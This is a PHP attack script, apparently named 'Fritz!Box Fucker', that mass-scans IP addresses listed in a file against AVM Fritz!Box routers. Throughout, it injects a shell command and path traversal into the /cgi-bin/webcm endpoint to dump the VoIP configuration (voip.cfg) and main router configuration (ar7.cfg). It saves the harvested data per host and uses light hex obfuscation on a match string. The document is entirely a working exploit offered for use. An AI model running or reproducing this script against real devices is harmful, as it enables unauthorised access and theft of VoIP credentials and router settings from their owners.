<?php
echo "
+++++++++++++++++++++++++++++++++++++++++++++++
++ Fritz!Box Fucker ++
++ By ++
++ BaD-HaCKeR-MaN ++
+++++++++++++++++++++++++++++++++++++++++++++++
";
set_time_limit(0);
error_reporting(0);
function func1($url){
$curl=curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26");
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl, CURLOPT_TIMEOUT,15);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function func2($url){
$curl=curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg %26");
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl, CURLOPT_TIMEOUT,15);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function func3($url){
$curl=curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20allcfgconv%20-C%20ar7%20-c%20-o%20-%20../../../../../var/flash/ar7.cfg%26");
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl, CURLOPT_TIMEOUT,15);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function func4($url){
$curl=curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_URL,$url."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20allcfgconv%20-C%20ar7%20-c%20-o%20-%20../../../../../var/flash/ar7.cfg%26");
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl, CURLOPT_TIMEOUT,15);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
$FritzBoxIps = file("ips.txt");
foreach($FritzBoxIps as $FritzBoxD){
/*
preg_match_all("/\|\s[0-9].*:/" , $FritzBoxD , $FritzBox);
$FritzBox = $FritzBox[0][0];
$FritzBox = str_replace("| " , "" , $FritzBox);
$FritzBox = str_replace(":" , "" , $FritzBox);
*/
if(preg_match("/\|\s/" , $FritzBoxD)){
preg_match_all("/\|\s.*\:/" , $FritzBoxD , $a);
$FritzBox = str_replace( "| " , "" , str_replace(":" , "" , $a[0][0]));
}else{
preg_match_all("/[0-9].*\.[0-9].*\.[0-9].*\.[0-9]*/" , $FritzBoxD , $a);
$FritzBox = $a[0][0];
}
echo "[+] Testing $FritzBox \n";
$FritzHTTP = func2("http://$FritzBox");
if(eregi("voipcfg" , $FritzHTTP)){
echo " + Success Exploit In http://$FritzBox/ \n";
$ar7 = func3("http://$FritzBox");
$fp = fopen($FritzBox.".txt", 'a+');
fwrite($fp, "http://$FritzBox \n\n $FritzHTTP \n\n $ar7 ");
fclose($fp);
}
$FritzHTTPS = func1("https://$FritzBox");
if(eregi("\x76\x6f\x69\x70\x63\x66\x67" , $FritzHTTPS)){
echo " + Success Exploit In https://$FritzBox/ \n";
$ar7 = func4("https://$FritzBox");
$fp = fopen($FritzBox.".txt", 'a+');
fwrite($fp, "\n\n https://$FritzBox \n\n $FritzHTTPS \n\n $ar7 ");
fclose($fp);
}
if(!eregi("voipcfg" , $FritzHTTP) and !eregi("\x76\x6f\x69\x70\x63\x66\x67" , $FritzHTTPS)){
$fp = fopen("Not-Opened.txt", 'a+');
fwrite($fp, "$FritzBox \n");
fclose($fp);
}
}
?>
